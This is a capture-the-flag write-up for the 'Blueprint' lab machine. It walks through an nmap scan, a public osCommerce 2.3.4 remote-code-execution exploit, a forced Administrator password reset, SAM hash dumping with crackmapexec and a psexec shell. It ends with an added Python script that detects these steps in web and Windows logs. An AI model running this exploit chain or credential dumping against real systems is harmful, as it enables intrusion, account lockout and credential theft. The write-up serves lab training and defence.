# Blueprint

## Nmap

```
sudo nmap 10.10.153.99 -sV -sS

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting with port 8080, we find a web server. Its index page shows that the e-commerce application osCommerce 2.3.4 is installed.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbwVUXcN9qT7m8Q9olRs0%2Fimage.png?alt=media\&token=215118f3-02e8-4209-9132-cc938faaf0e6)

A quick preliminary check with `searchsploit` shows several public exploits for this version.

```bash
searchsploit oscommerce 2.3.4 -w
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQtTjKVIa1cVgxvnv5NrT%2Fimage.png?alt=media\&token=2ef0a20f-3c04-45e1-aca8-0f8317d67eec)

Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648.

GitHub: <https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution>

The repository describes the exploit as follows:

*"Exploiting the install.php finish process by injecting php payload into the db\_database parameter & read the system command output from configure.php"*.

Following the usage example in the README, we clone the repository and run the script with the following syntax:

```bash
python3 exploit.py http://<IP>/oscommerce-2.3.4/catalog/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FU7VcMMVnhZuhe7TlBQOm%2Fimage.png?alt=media\&token=b2529034-660e-4de2-b19b-a6c505ec2822)

After gaining SYSTEM-level command execution on the target, we aim to obtain a proper interactive shell and to dump the password hashes from the system.

With SYSTEM access we reset the local Administrator password to a known value. This is a destructive change: it locks out the legitimate owner of the account and is recorded in the Security event log.

```bash
net user administrator Password123
```

We then use `crackmapexec` with local authentication to dump the NTLM hashes from the SAM database.

```bash
crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FI08pJoYvG4ZMZvDPEh1U%2Fimage.png?alt=media\&token=e3e6c01c-8672-4d58-a82b-9cffc041705f)

With the hashes dumped, we use Impacket's `psexec.py` and the new password to obtain shell access on the target.

```bash
psexec.py ./administrator:'Password123'@'10.10.153.99'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ff48FlNcjDWicnFyD0pjk%2Fimage.png?alt=media\&token=59cb8f02-e42b-4de0-9323-e2e0ffc52569)
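From the defender's side, the chain above leaves distinct traces: a request to the osCommerce installer, which should have been deleted after deployment; a reset of the local Administrator password (Security event 4724); the Remote Registry service starting, which the remote SAM dump relies on; and a randomly named service being installed for the remote shell (System event 7045). The following Python script is an added example, not part of the original writeup, that runs those checks over constructed sample records; the simplified event field names and the random-service-name heuristic are assumptions.

```python
import re

# Constructed sample records (not from the original page): two Apache access-log lines
# from the osCommerce host and four Windows events flattened into dicts with
# simplified field names (the event IDs themselves are the real Windows ones).
APACHE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 5120',
    '10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "POST /oscommerce-2.3.4/catalog/install/install.php HTTP/1.1" 200 310',
]
WIN_EVENTS = [
    {"log": "Security", "id": 4624, "TargetUserName": "Administrator", "SubjectUserName": "-"},
    {"log": "Security", "id": 4724, "TargetUserName": "Administrator", "SubjectUserName": "SYSTEM"},
    {"log": "System", "id": 7036, "Service": "Remote Registry", "State": "running"},
    {"log": "System", "id": 7045, "ServiceName": "hFqa", "ImagePath": "%SystemRoot%\\hFqaLtbZ.exe"},
]

# Any request to the installer after deployment is a finding: install/ should be removed.
INSTALL_RE = re.compile(r'"(?:GET|POST) (\S*/install/install\.php)')
# Heuristic (assumption): short all-letter service names as remote-exec tooling generates.
RANDOM_SVC_RE = re.compile(r"^[A-Za-z]{4,8}$")

def web_findings(lines):
    """Return the installer paths requested in the access log."""
    hits = []
    for line in lines:
        m = INSTALL_RE.search(line)
        if m:
            hits.append(m.group(1))
    return hits

def host_findings(events):
    """Map the post-exploitation steps of the walkthrough onto host-side events."""
    found = []
    for e in events:
        if e["log"] == "Security" and e["id"] == 4724:  # account password reset
            found.append(f"password reset on {e['TargetUserName']} by {e['SubjectUserName']}")
        elif (e["log"] == "System" and e["id"] == 7036
              and e.get("Service") == "Remote Registry" and e.get("State") == "running"):
            found.append("Remote Registry service started (precondition for a remote SAM dump)")
        elif e["log"] == "System" and e["id"] == 7045 and RANDOM_SVC_RE.match(e["ServiceName"]):
            found.append(f"random-named service {e['ServiceName']} installed from {e['ImagePath']}")
    return found

def triage(lines, events):
    """Combine both sources; the chain is complete when the web step and all three host steps appear."""
    web, host = web_findings(lines), host_findings(events)
    return {"web": web, "host": host, "chain_complete": bool(web) and len(host) == 3}
```

Run against real data, the Apache lines come from the web server's access log and the events from a Security/System log export; the ordinary 4624 logon in the sample is deliberately not flagged.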
